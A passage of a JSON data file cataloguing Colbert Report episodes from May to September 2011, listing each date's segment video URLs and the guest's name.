        "http://thecolbertreport.cc.com/videos/38grqn/the-word---autocratic-for-the-people",
        "http://thecolbertreport.cc.com/videos/d8bi6b/lupe-fiasco",
        "http://thecolbertreport.cc.com/videos/vonv0r/sign-off---lupe-fiasco-s--lasers-"
      ],
      "guest": "Lupe Fiasco"
    },
    {
      "date": "2011-05-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/r02fac/newt-gingrich---donald-trump-announce-future-announcements",
        "http://thecolbertreport.cc.com/videos/w3lgcs/yahweh-or-no-way---thor---apocalypse-billboard",
        "http://thecolbertreport.cc.com/videos/zu0ju2/difference-makers---donald-trump",
        "http://thecolbertreport.cc.com/videos/i4gyok/geoffrey-rush",
        "http://thecolbertreport.cc.com/videos/wmfolw/sign-off---a-rare-correction"
      ],
      "guest": "Geoffrey Rush"
    },
    {
      "date": "2011-05-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/g0js2x/intro---5-11-11",
        "http://thecolbertreport.cc.com/videos/txo75b/herman-cain-claims-the-colbert-bump",
        "http://thecolbertreport.cc.com/videos/1ssaiz/corp-constituency",
        "http://thecolbertreport.cc.com/videos/nfv0i1/corp-constituency---trevor-potter",
        "http://thecolbertreport.cc.com/videos/rqvi06/award-to-the-wise",
        "http://thecolbertreport.cc.com/videos/sjt27k/eric-greitens",
        "http://thecolbertreport.cc.com/videos/q3siyv/sign-off---press-hat"
      ],
      "guest": "Eric Greitens"
    },
    {
      "date": "2011-05-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mp7mrs/intro---5-12-11",
        "http://thecolbertreport.cc.com/videos/zz94qv/obama-s-latino-panderfest",
        "http://thecolbertreport.cc.com/videos/vkp4tr/terror--a-new-one",
        "http://thecolbertreport.cc.com/videos/9o0mt6/terror--a-new-one---lawrence-wright",
        "http://thecolbertreport.cc.com/videos/dqvz13/if-at-first-you-don-t-secede",
        "http://thecolbertreport.cc.com/videos/yx5grt/john-bradshaw",
        "http://thecolbertreport.cc.com/videos/sw8fy6/sign-off---stephen-s-super-pac-needs-support"
      ],
      "guest": "John Bradshaw"
    },
    {
      "date": "2011-05-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9xaxr4/mike-huckabee---donald-trump-drop-out",
        "http://thecolbertreport.cc.com/videos/duon08/fig-newton-gingrich-2012",
        "http://thecolbertreport.cc.com/videos/epwg6t/stephen-files-super-pac-request",
        "http://thecolbertreport.cc.com/videos/g3ep11/alison-klayman",
        "http://thecolbertreport.cc.com/videos/4r7evh/sign-off---goodnight"
      ],
      "guest": "Alison Klayman"
    },
    {
      "date": "2011-05-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ip5tv7/intro---5-17-11",
        "http://thecolbertreport.cc.com/videos/1ugsri/world-s-oldest-panda-dies",
        "http://thecolbertreport.cc.com/videos/l4p5dq/the-word---enhanced-rejustification",
        "http://thecolbertreport.cc.com/videos/pg06l0/arnold-schwarzenegger-s-sex-scandal",
        "http://thecolbertreport.cc.com/videos/58filp/amy-kremer",
        "http://thecolbertreport.cc.com/videos/no1rv9/sign-off---goodnight"
      ],
      "guest": "Amy Kremer"
    },
    {
      "date": "2011-05-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/faf2no/exclusive---austan-goolsbee-extended-interview-pt--1",
        "http://thecolbertreport.cc.com/videos/6pf58s/exclusive---austan-goolsbee-extended-interview-pt--2",
        "http://thecolbertreport.cc.com/videos/bdi4g4/exclusive---austan-goolsbee-extended-interview-pt--3",
        "http://thecolbertreport.cc.com/videos/6khcvr/intro---5-18-11",
        "http://thecolbertreport.cc.com/videos/55ye8a/osama-bin-laden-s-replacement",
        "http://thecolbertreport.cc.com/videos/tohq6g/tip-wag---ohio-legislature---facebook",
        "http://thecolbertreport.cc.com/videos/2cxcrh/breaking-newt",
        "http://thecolbertreport.cc.com/videos/vvu071/austan-goolsbee",
        "http://thecolbertreport.cc.com/videos/sklv51/sign-off---long-austan-goolsbee-interview"
      ],
      "guest": "Austan Goolsbee"
    },
    {
      "date": "2011-05-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7qmvog/john-lithgow-performs-gingrich-press-release",
        "http://thecolbertreport.cc.com/videos/pb82sf/better-know-a-district---illinois--18th---aaron-schock-update",
        "http://thecolbertreport.cc.com/videos/3gd1zf/clergy-matic-ecclesi-action-center-3-16",
        "http://thecolbertreport.cc.com/videos/5ec3r8/kareem-abdul-jabbar",
        "http://thecolbertreport.cc.com/videos/p12tcc/sign-off---history-of-life-on-earth"
      ],
      "guest": "Kareem Abdul-Jabbar"
    },
    {
      "date": "2011-05-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gn9ut5/intro---5-31-11",
        "http://thecolbertreport.cc.com/videos/xxn340/charleston-to-bermuda-yacht-race",
        "http://thecolbertreport.cc.com/videos/fgthom/sarah-palin-s-bus-tour",
        "http://thecolbertreport.cc.com/videos/bmwaxh/fec-questions---trevor-potter",
        "http://thecolbertreport.cc.com/videos/7bl2ga/invisible-judgment",
        "http://thecolbertreport.cc.com/videos/ox3on4/james-stewart",
        "http://thecolbertreport.cc.com/videos/vn091b/sign-off---goodnight"
      ],
      "guest": "James B. Stewart"
    },
    {
      "date": "2011-06-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nos79v/intro---6-1-11",
        "http://thecolbertreport.cc.com/videos/mqb30h/sarah-palin-visits-the-times-square-applebee-s",
        "http://thecolbertreport.cc.com/videos/ul70kx/meat-tweet",
        "http://thecolbertreport.cc.com/videos/jph6sv/harmful-cell-phones",
        "http://thecolbertreport.cc.com/videos/beqc1p/who-s-riding-my-coattails-now----jimmy-fallon",
        "http://thecolbertreport.cc.com/videos/5a4ke7/robert-f--kennedy-jr-",
        "http://thecolbertreport.cc.com/videos/3enqpr/sign-off---iphone"
      ],
      "guest": "Robert Kennedy Jr."
    },
    {
      "date": "2011-06-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7o4l3r/intro---6-2-11",
        "http://thecolbertreport.cc.com/videos/rqi6dy/dancing-on-the-ceiling",
        "http://thecolbertreport.cc.com/videos/1db84y/anthony-weiner-addresses-twitter-scandal",
        "http://thecolbertreport.cc.com/videos/qhexu1/tip-wag---osama-bin-laden---hugh-hefner",
        "http://thecolbertreport.cc.com/videos/8t7m7k/salman-khan",
        "http://thecolbertreport.cc.com/videos/rqa2ar/sign-off---goodnight"
      ],
      "guest": "Salman Khan"
    },
    {
      "date": "2011-06-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bwqzbu/anthony-weiner-s-emergency-press-conference",
        "http://thecolbertreport.cc.com/videos/uvi91o/paul-revere-s-famous-ride",
        "http://thecolbertreport.cc.com/videos/x424g2/stephen-s-twitter-scandal",
        "http://thecolbertreport.cc.com/videos/qyadrw/obama-administration-replaces-food-pyramid",
        "http://thecolbertreport.cc.com/videos/fdolcv/werner-herzog",
        "http://thecolbertreport.cc.com/videos/ed6qec/stephen-s-midnight-ride"
      ],
      "guest": "Werner Herzog"
    },
    {
      "date": "2011-06-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/suzxde/scott-pelley-s-first-cbs-broadcast",
        "http://thecolbertreport.cc.com/videos/1w9fvc/the-word---hear-no-evil",
        "http://thecolbertreport.cc.com/videos/fvvawg/sugar-ray-leonard",
        "http://thecolbertreport.cc.com/videos/b4ot0e/apologies-to-shimshamistan"
      ],
      "guest": "Sugar Ray Leonard"
    },
    {
      "date": "2011-06-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fq1085/herman-cain-wants-small-bills",
        "http://thecolbertreport.cc.com/videos/bmggoz/better-know-a-district---california-s-10th---john-garamendi",
        "http://thecolbertreport.cc.com/videos/ycdgvg/weiner-captures-manscaping-vote",
        "http://thecolbertreport.cc.com/videos/yvz8wj/bre-pettis",
        "http://thecolbertreport.cc.com/videos/ao2r17/sign-off---makerbot-head"
      ],
      "guest": "Bre Pettis"
    },
    {
      "date": "2011-06-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tz9edm/shaquille-o-neal-retires",
        "http://thecolbertreport.cc.com/videos/umrvml/mitt-romney-leads-in-fox-news-poll",
        "http://thecolbertreport.cc.com/videos/qgxogp/the-word---the-business-end",
        "http://thecolbertreport.cc.com/videos/oneftb/andrew-breitbart-reveals-weiner-photo",
        "http://thecolbertreport.cc.com/videos/5f3kap/tom-ridge",
        "http://thecolbertreport.cc.com/videos/vvj5q2/sign-off---goodnight"
      ],
      "guest": "Tom Ridge"
    },
    {
      "date": "2011-06-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0zzkov/anthony-weiner-gym-photos",
        "http://thecolbertreport.cc.com/videos/vgcql3/sport-report---miami-heat--fifa---freestyle-canoe-dancing",
        "http://thecolbertreport.cc.com/videos/vyyl7z/henry-kissinger-pt--1",
        "http://thecolbertreport.cc.com/videos/2j87li/henry-kissinger-pt--2",
        "http://thecolbertreport.cc.com/videos/w5b5l1/sign-off---goodnight"
      ],
      "guest": "Henry Kissinger"
    },
    {
      "date": "2011-06-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lokk6e/intro---6-14-11",
        "http://thecolbertreport.cc.com/videos/egh1n7/elephants-in-the-room",
        "http://thecolbertreport.cc.com/videos/ykt712/close-sesame",
        "http://thecolbertreport.cc.com/videos/s6kp16/janny-scott",
        "http://thecolbertreport.cc.com/videos/j0gylk/sign-off---marshmallows"
      ],
      "guest": "Janny Scott"
    },
    {
      "date": "2011-06-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/d8iaxd/intro---6-15-11",
        "http://thecolbertreport.cc.com/videos/zj00ia/iran-bans-necklaces-and-shorts",
        "http://thecolbertreport.cc.com/videos/xbt4w9/kindergarten-gop",
        "http://thecolbertreport.cc.com/videos/ynp682/the-word---shock-the-vote",
        "http://thecolbertreport.cc.com/videos/46tlsv/senior-moment---pot-smoking-seniors",
        "http://thecolbertreport.cc.com/videos/5h6ee5/keith-olbermann",
        "http://thecolbertreport.cc.com/videos/5rh3rg/sign-off---stephen-wears-shorts"
      ],
      "guest": "Keith Olbermann"
    },
    {
      "date": "2011-06-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2374v3/intro---6-20-11",
        "http://thecolbertreport.cc.com/videos/q7b70y/stephest-colbchella--011---rock-you-like-a-thirst-icane",
        "http://thecolbertreport.cc.com/videos/y7lr8u/threatdown---moo-shu-man-milk--centenarians---robo-slackers",
        "http://thecolbertreport.cc.com/videos/gds7n9/justin-vernon",
        "http://thecolbertreport.cc.com/videos/su735n/sign-off---bon-iver-bonus-song"
      ],
      "guest": "Bon Iver"
    },
    {
      "date": "2011-06-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3o3le7/generic-republican-presidential-nominee",
        "http://thecolbertreport.cc.com/videos/ct0au7/stephest-colbchella--011---stephen-revives-his-music-career",
        "http://thecolbertreport.cc.com/videos/v43nph/2011--a-rock-odyssey-featuring-jack-white-pt--1",
        "http://thecolbertreport.cc.com/videos/7e8ifi/florence-welch",
        "http://thecolbertreport.cc.com/videos/ei7r0b/sign-off---talib-kweli-tomorrow"
      ],
      "guest": "Florence and the Machine"
    },
    {
      "date": "2011-06-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/f5h9ob/george-w--bush-helps-break-a-world-record",
        "http://thecolbertreport.cc.com/videos/ozlnky/2011--a-rock-odyssey-featuring-jack-white-pt--2",
        "http://thecolbertreport.cc.com/videos/u3bmmq/the-word---the-defining-moment",
        "http://thecolbertreport.cc.com/videos/c7shlp/talib-kweli"
      ],
      "guest": "Talib Kweli"
    },
    {
      "date": "2011-06-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ihqt34/exclusive---2011--a-rock-odyssey-featuring-jack-white---catholic-throwdown",
        "http://thecolbertreport.cc.com/videos/zbc2ok/stephest-colbchella--011---stephen-announces-his-hit-song",
        "http://thecolbertreport.cc.com/videos/1if3ir/nation-building-in-america",
        "http://thecolbertreport.cc.com/videos/4evhq9/2011--a-rock-odyssey-featuring-jack-white-pt--3",
        "http://thecolbertreport.cc.com/videos/39or3g/jack-white"
      ],
      "guest": "The Black Belles"
    },
    {
      "date": "2011-06-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8tiso3/intro---6-27-11",
        "http://thecolbertreport.cc.com/videos/zz1v27/tip-wag---scented-razors---rick-scott-s-approval-rating",
        "http://thecolbertreport.cc.com/videos/7e3kfb/stephen---jonathan-alter-at-gaillard-auditorium",
        "http://thecolbertreport.cc.com/videos/npgonl/good-point-other-point---ted-nugent-vs--millennials",
        "http://thecolbertreport.cc.com/videos/89vjk7/grover-norquist",
        "http://thecolbertreport.cc.com/videos/fe2wnr/sign-off---scented-box-cutter"
      ],
      "guest": "Grover Norquist"
    },
    {
      "date": "2011-06-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gs5b2y/intro---6-28-11",
        "http://thecolbertreport.cc.com/videos/im5by3/michele-bachmann-compares-herself-to-john-wayne",
        "http://thecolbertreport.cc.com/videos/b2dez1/the-word---too-big-to-nail",
        "http://thecolbertreport.cc.com/videos/eztgrx/advertising-to-monkeys",
        "http://thecolbertreport.cc.com/videos/jfztdi/alexandra-pelosi",
        "http://thecolbertreport.cc.com/videos/1it2j9/sign-off---teleprompter-eulogy"
      ],
      "guest": "Alexandra Pelosi"
    },
    {
      "date": "2011-06-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/e7dlbc/intro---6-29-11",
        "http://thecolbertreport.cc.com/videos/s3xttd/4th-of-july-under-attack---fireworks-cancelled",
        "http://thecolbertreport.cc.com/videos/7gul1z/colbert-super-pac---irresponsible-advertising",
        "http://thecolbertreport.cc.com/videos/kco7lo/colbert-super-pac---trevor-potter-preps-stephen-for-his-fec-hearing",
        "http://thecolbertreport.cc.com/videos/o7wrgl/hometown-hero-town---lexington--ky",
        "http://thecolbertreport.cc.com/videos/zc23xv/gary-sinise",
        "http://thecolbertreport.cc.com/videos/80a7v2/sign-off---see-you-at-the-fec"
      ],
      "guest": "Gary Sinise"
    },
    {
      "date": "2011-06-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3yk8uf/intro---6-30-11",
        "http://thecolbertreport.cc.com/videos/gffis7/colbert-super-pac---i-can-haz-super-pac-",
        "http://thecolbertreport.cc.com/videos/uf525x/colbert-super-pac---stephen-addresses-colbert-super-nation",
        "http://thecolbertreport.cc.com/videos/owodco/formidable-opponent---pakistan",
        "http://thecolbertreport.cc.com/videos/807lhi/timothy-garton-ash",
        "http://thecolbertreport.cc.com/videos/b2dqnd/sign-off---super-pac-donations"
      ],
      "guest": "Timothy Garton Ash"
    },
    {
      "date": "2011-07-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/t8xnmj/intro---7-11-11",
        "http://thecolbertreport.cc.com/videos/sgqex9/colbert-super-pac---pushing-the-limits",
        "http://thecolbertreport.cc.com/videos/m3svek/anti-frack-attacks",
        "http://thecolbertreport.cc.com/videos/2h3oe2/tip-wag---conservative-john-lennon---unfunny-germany",
        "http://thecolbertreport.cc.com/videos/z2r2b0/michael-shermer",
        "http://thecolbertreport.cc.com/videos/g47pr3/sign-off---super-pac-fundraising-goal"
      ],
      "guest": "Michael Shermer"
    },
    {
      "date": "2011-07-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/20gpt7/herman-cain-train",
        "http://thecolbertreport.cc.com/videos/7aive1/the-family-leader-s-controversial-pledge",
        "http://thecolbertreport.cc.com/videos/7sobpk/heterosexual-accountability-buddy",
        "http://thecolbertreport.cc.com/videos/vw4tol/dan-savage",
        "http://thecolbertreport.cc.com/videos/nkuukl/sign-off---fixing-the-boiler"
      ],
      "guest": "Dan Savage"
    },
    {
      "date": "2011-07-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/smsyco/intro---7-13-11",
        "http://thecolbertreport.cc.com/videos/70lgql/flagworth-2012",
        "http://thecolbertreport.cc.com/videos/7gb5kn/republicans-choose-none-of-the-above",
        "http://thecolbertreport.cc.com/videos/palj9t/obama-calls-the-republican-bluff",
        "http://thecolbertreport.cc.com/videos/5ulzg5/david-mccullough",
        "http://thecolbertreport.cc.com/videos/7xngpa/sign-off---pen-toss"
      ],
      "guest": "David McCullough"
    },
    {
      "date": "2011-07-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/h2i0g7/intro---7-14-11",
        "http://thecolbertreport.cc.com/videos/8oisqi/carmageddon",
        "http://thecolbertreport.cc.com/videos/uqj8qb/may-the-best-stephen-colbert-win",
        "http://thecolbertreport.cc.com/videos/a29405/murdoch-s-media-empire-might-go-down-the-toilet",
        "http://thecolbertreport.cc.com/videos/1o1flh/improvised-expressive-devices",
        "http://thecolbertreport.cc.com/videos/82ovjs/jose-antonio-vargas",
        "http://thecolbertreport.cc.com/videos/9nwz4n/sign-off---goodnight"
      ],
      "guest": "Jose Antonio Vargas"
    },
    {
      "date": "2011-07-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ureory/intro---7-18-11",
        "http://thecolbertreport.cc.com/videos/ybue54/epic-blockbuster",
        "http://thecolbertreport.cc.com/videos/7t9e81/colbert-super-pac---cash-crawl",
        "http://thecolbertreport.cc.com/videos/73lwqj/colbert-super-pac---campaign-finance",
        "http://thecolbertreport.cc.com/videos/9q309t/blood-in-the-water---rupert-murdoch-s-news-of-the-world-scandal",
        "http://thecolbertreport.cc.com/videos/36812w/john-prendergast",
        "http://thecolbertreport.cc.com/videos/d8rt51/sign-off---prerecorded-episodes"
      ],
      "guest": "John Prendergast"
    },
    {
      "date": "2011-07-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bcunwj/newt-s-white-whale",
        "http://thecolbertreport.cc.com/videos/nhl043/god-calls-rick-perry",
        "http://thecolbertreport.cc.com/videos/6cdpui/debt-ceiling-deadline-conspiracy",
        "http://thecolbertreport.cc.com/videos/maophz/david-carr",
        "http://thecolbertreport.cc.com/videos/50pek1/sign-off---goodnight"
      ],
      "guest": "David Carr"
    },
    {
      "date": "2011-07-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pmh9y8/humanized-by-pie",
        "http://thecolbertreport.cc.com/videos/ozixqy/voter-id-laws",
        "http://thecolbertreport.cc.com/videos/2i29ww/congressional-partisan-rancor",
        "http://thecolbertreport.cc.com/videos/2p2ijk/michael-sandel",
        "http://thecolbertreport.cc.com/videos/tia7kd/sign-off---reading"
      ],
      "guest": "Michael Sandel"
    },
    {
      "date": "2011-07-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/egjics/intro---7-21-11",
        "http://thecolbertreport.cc.com/videos/l3rcr1/death-of-america-s-space-program",
        "http://thecolbertreport.cc.com/videos/vntv81/i-s-on-edjukashun---gay-history---disney-english",
        "http://thecolbertreport.cc.com/videos/6yym31/nbc--no-butt-coverage",
        "http://thecolbertreport.cc.com/videos/9catel/david-eagleman",
        "http://thecolbertreport.cc.com/videos/nn8qoh/sign-off---space-robot"
      ],
      "guest": "David Eagleman"
    },
    {
      "date": "2011-07-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/l0wxhe/y2-gay",
        "http://thecolbertreport.cc.com/videos/fbd6kf/norwegian-muslish-gunman-s-islam-esque-atrocity",
        "http://thecolbertreport.cc.com/videos/wznkdz/vaginal-puppeteering-vs--d--k-scrub",
        "http://thecolbertreport.cc.com/videos/z4gfkc/brian-cox",
        "http://thecolbertreport.cc.com/videos/9q5n38/sign-off---the-thinker"
      ],
      "guest": "Brian Cox"
    },
    {
      "date": "2011-07-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bzl0xh/intro---7-26-11",
        "http://thecolbertreport.cc.com/videos/umjv5s/herman-cain-cancels-on-stephen",
        "http://thecolbertreport.cc.com/videos/zq2rpw/-poor--in-america",
        "http://thecolbertreport.cc.com/videos/j2gcnk/-poor--in-america---peter-edelman",
        "http://thecolbertreport.cc.com/videos/a4awyb/america-s-bucket-list",
        "http://thecolbertreport.cc.com/videos/azl59v/brooke-gladstone",
        "http://thecolbertreport.cc.com/videos/ly4qfz/sign-off---america-s-bucket-list"
      ],
      "guest": "Brooke Gladstone"
    },
    {
      "date": "2011-07-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zq1omv/nissan-s--leaf-wave--deadline",
        "http://thecolbertreport.cc.com/videos/x50fvb/difference-makers---patrick-rodgers",
        "http://thecolbertreport.cc.com/videos/3o44r7/helium-runs-out",
        "http://thecolbertreport.cc.com/videos/omkngv/missy-cummings",
        "http://thecolbertreport.cc.com/videos/y4zc9o/sign-off---surveillance-drone-crash"
      ],
      "guest": "Mary \"Missy\" Cummings"
    },
    {
      "date": "2011-07-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8c1oeo/the-republican-ring-of-power",
        "http://thecolbertreport.cc.com/videos/yzmsiz/colbert-super-pac---for-the-children",
        "http://thecolbertreport.cc.com/videos/e4r2vc/colbert-super-pac---matthew-dowd---ham-rove",
        "http://thecolbertreport.cc.com/videos/z6f8m4/buddy-roemer-pt--1",
        "http://thecolbertreport.cc.com/videos/n4ldiq/buddy-roemer-pt--2",
        "http://thecolbertreport.cc.com/videos/tzpdu5/sign-off---cone-of-silence"
      ],
      "guest": "Buddy Roemer"
    },
    {
      "date": "2011-08-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/aqw9op/intro---8-1-11",
        "http://thecolbertreport.cc.com/videos/lrz1ud/-three-billy-goats-gruff--budget-negotiations",
        "http://thecolbertreport.cc.com/videos/mgkqu6/the-word---with-great-power-comes-no-responsibility",
        "http://thecolbertreport.cc.com/videos/6v3oa3/from-ashes-to-bullets",
        "http://thecolbertreport.cc.com/videos/mqbxt0/tony-hsieh",
        "http://thecolbertreport.cc.com/videos/sqd53z/sign-off---sneakers"
      ],
      "guest": "Tony Hsieh"
    },
    {
      "date": "2011-08-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xaqx6o/intro---8-2-11",
        "http://thecolbertreport.cc.com/videos/j862uf/newt-gingrich-s-twitter-scandal",
        "http://thecolbertreport.cc.com/videos/pzfcj1/america-s-credit-grating",
        "http://thecolbertreport.cc.com/videos/y1xqdj/america-s-credit-grating---david-leonhardt",
        "http://thecolbertreport.cc.com/videos/gg2p1r/baby-teeth-economy",
        "http://thecolbertreport.cc.com/videos/id20x6/al-hunt",
        "http://thecolbertreport.cc.com/videos/h26uru/sign-off---goodnight"
      ],
      "guest": "Al Hunt"
    },
    {
      "date": "2011-08-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/br7gdf/intro---8-3-11",
        "http://thecolbertreport.cc.com/videos/3i1326/multiracial-spider-man",
        "http://thecolbertreport.cc.com/videos/f3w320/threatdown---fake-states--sharia-weather---monopoly",
        "http://thecolbertreport.cc.com/videos/cvc16w/women-s-health-nazi-plan",
        "http://thecolbertreport.cc.com/videos/6x0m3y/robert-wittman",
        "http://thecolbertreport.cc.com/videos/utsxoh/sign-off---official-flag-updater"
      ],
      "guest": "Robert Wittman"
    },
    {
      "date": "2011-08-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/t3bxny/intro---8-4-11",
        "http://thecolbertreport.cc.com/videos/8tx5s2/barack-obama-s-50th-birthday",
        "http://thecolbertreport.cc.com/videos/7ahjkr/colbert-super-pac---the-heroes-respond",
        "http://thecolbertreport.cc.com/videos/ma6ejy/wisconsin-s-recall-election---americans-for-prosperity-s-absentee-ballot-typos",
        "http://thecolbertreport.cc.com/videos/8q9pe2/sport-report---baseball-s-lowest-records---mlb-s-twitter-feed",
        "http://thecolbertreport.cc.com/videos/d8704f/anthony-bourdain",
        "http://thecolbertreport.cc.com/videos/afj5qe/sign-off---goodnight"
      ],
      "guest": "Anthony Bourdain"
    },
    {
      "date": "2011-08-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/smerqo/america-s-credit-downgrade",
        "http://thecolbertreport.cc.com/videos/y7x3es/colbert-super-pac---rick-perry-for-president",
        "http://thecolbertreport.cc.com/videos/lu1v74/doomsday-bargain-bunkers",
        "http://thecolbertreport.cc.com/videos/wkairk/nassir-ghaemi",
        "http://thecolbertreport.cc.com/videos/4zkkn5/sign-off---stephen-sniffs-a-marker"
      ],
      "guest": "Nassir Ghaemi"
    },
    {
      "date": "2011-08-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tufpnm/intro---8-9-11",
        "http://thecolbertreport.cc.com/videos/pxptx8/heatsteria",
        "http://thecolbertreport.cc.com/videos/rtqznl/the-word---head-in-the-cloud",
        "http://thecolbertreport.cc.com/videos/gj6vb5/ric-ocasek"
      ],
      "guest": "The Cars"
    },
    {
      "date": "2011-08-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mjvryb/intro---8-10-11",
        "http://thecolbertreport.cc.com/videos/1jlwac/hooker-drawer-market",
        "http://thecolbertreport.cc.com/videos/cw4el2/yahweh-or-no-way---mormons---god-s-poll-numbers",
        "http://thecolbertreport.cc.com/videos/uulxb3/god-s-job-performance---jim-martin",
        "http://thecolbertreport.cc.com/videos/15zleh/colbert-super-pac---campaign-donation-addiction",
        "http://thecolbertreport.cc.com/videos/zxka8u/elliot-ackerman",
        "http://thecolbertreport.cc.com/videos/mvgmwy/sign-off---e-mailing-colbert-nation"
      ],
      "guest": "Elliott Ackerman"
    },
    {
      "date": "2011-08-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pi19ix/super-pac-ad---behind-the-green-corn",
        "http://thecolbertreport.cc.com/videos/x1aodj/super-pac-ad---episode-iv--a-new-hope",
        "http://thecolbertreport.cc.com/videos/etbj36/romney-2012----corporations-are-people-",
        "http://thecolbertreport.cc.com/videos/90ptp7/colbert-super-pac---rick-parry-with-an--a--for-america",
        "http://thecolbertreport.cc.com/videos/swbu9s/colbert-super-pac---confused-by-rick-parry-with-an--a--for-america",
        "http://thecolbertreport.cc.com/videos/yu257u/gloria-steinem",
        "http://thecolbertreport.cc.com/videos/7x3ryp/sign-off---stephen-s-emmy-award"
      ],
      "guest": "Gloria Steinem"
    },
    {
      "date": "2011-08-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/40fotx/exclusive---susan-rice-extended-interview-pt--1",
        "http://thecolbertreport.cc.com/videos/vvlrva/exclusive---susan-rice-extended-interview-pt--2",
        "http://thecolbertreport.cc.com/videos/lqjncy/susan-rice-extended-interview-pt--3",
        "http://thecolbertreport.cc.com/videos/0yyo1z/colbert-super-pac---stephen-apologizes-to-woi-in-des-moines",
        "http://thecolbertreport.cc.com/videos/dzchwi/colbert-super-pac---iowa-straw-poll-results",
        "http://thecolbertreport.cc.com/videos/dkh4ps/susan-rice-pt--1",
        "http://thecolbertreport.cc.com/videos/nla0b4/susan-rice-pt--2",
        "http://thecolbertreport.cc.com/videos/1rtsq5/sign-off---full-susan-rice-interview-online"
      ],
      "guest": "Amb. Susan Rice"
    },
    {
      "date": "2011-08-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/i0nwuy/exclusive---space-shuttle-atlantis-crew---extended-interview-pt--1",
        "http://thecolbertreport.cc.com/videos/8gjrx4/exclusive---space-shuttle-atlantis-crew---extended-interview-pt--2",
        "http://thecolbertreport.cc.com/videos/rmrfc3/the-etymology-of--obamacare-",
        "http://thecolbertreport.cc.com/videos/cjfda6/colbert-super-pac---persuadulux-6000",
        "http://thecolbertreport.cc.com/videos/m00z1i/colbert-super-pac---frank-luntz-commits-to-the-pac",
        "http://thecolbertreport.cc.com/videos/a8v2gy/nasa-s-greatest-moments-montage",
        "http://thecolbertreport.cc.com/videos/nnfhdg/chris-ferguson--doug-hurley--rex-walheim---sandy-magnus",
        "http://thecolbertreport.cc.com/videos/h83o7v/sign-off---stephen-s-launch-pad-nut"
      ],
      "guest": "STS-135 astronauts"
    },
    {
      "date": "2011-08-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/brmz0s/exclusive---jeff-bridges-for-summer-s-eve",
        "http://thecolbertreport.cc.com/videos/1cvtnm/intro---8-17-11",
        "http://thecolbertreport.cc.com/videos/yk47i3/colbert-super-pac---rick-perry-s-treasurer",
        "http://thecolbertreport.cc.com/videos/uiim37/tip-wag---evangelical-scientists---rick-santorum",
        "http://thecolbertreport.cc.com/videos/4km5oi/jeff-bridges",
        "http://thecolbertreport.cc.com/videos/1bb0sg/sign-off---jeff-bridges--album-cover"
      ],
      "guest": "Jeff Bridges"
    },
    {
      "date": "2011-08-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/237rh7/intro---8-18-11",
        "http://thecolbertreport.cc.com/videos/oqd808/russia-s-james-bonds-vs--america-s-barack-obama",
        "http://thecolbertreport.cc.com/videos/j31bbb/colbert-super-pac---parry-with-an-a-gate----day-6---we-may-have-did-it-",
        "http://thecolbertreport.cc.com/videos/94c0x7/colbert-super-pac---parry-with-an-a-gate----day-6---woi-in-des-moines-reports",
        "http://thecolbertreport.cc.com/videos/ger41z/anderson-cooper-s-kryptonite",
        "http://thecolbertreport.cc.com/videos/1yhudu/kevin-mitnick",
        "http://thecolbertreport.cc.com/videos/5r0lwc/sign-off---woi-in-des-moines"
      ],
      "guest": "Kevin Mitnick"
    },
    {
      "date": "2011-09-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/s3kv9p/michele-bachmann-s-natural-disaster-metaphor",
        "http://thecolbertreport.cc.com/videos/fk34r7/the-word---happy-endings",
        "http://thecolbertreport.cc.com/videos/ovw3t4/cheating-death---placebocisers---vaxamalgam",
        "http://thecolbertreport.cc.com/videos/1cua0e/tim-pawlenty",
        "http://thecolbertreport.cc.com/videos/d2roue/sign-off---placebocisers"
      ],
      "guest": "Gov. Tim Pawlenty"
    },
    {
      "date": "2011-09-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1iqy2m/intro---9-7-11",
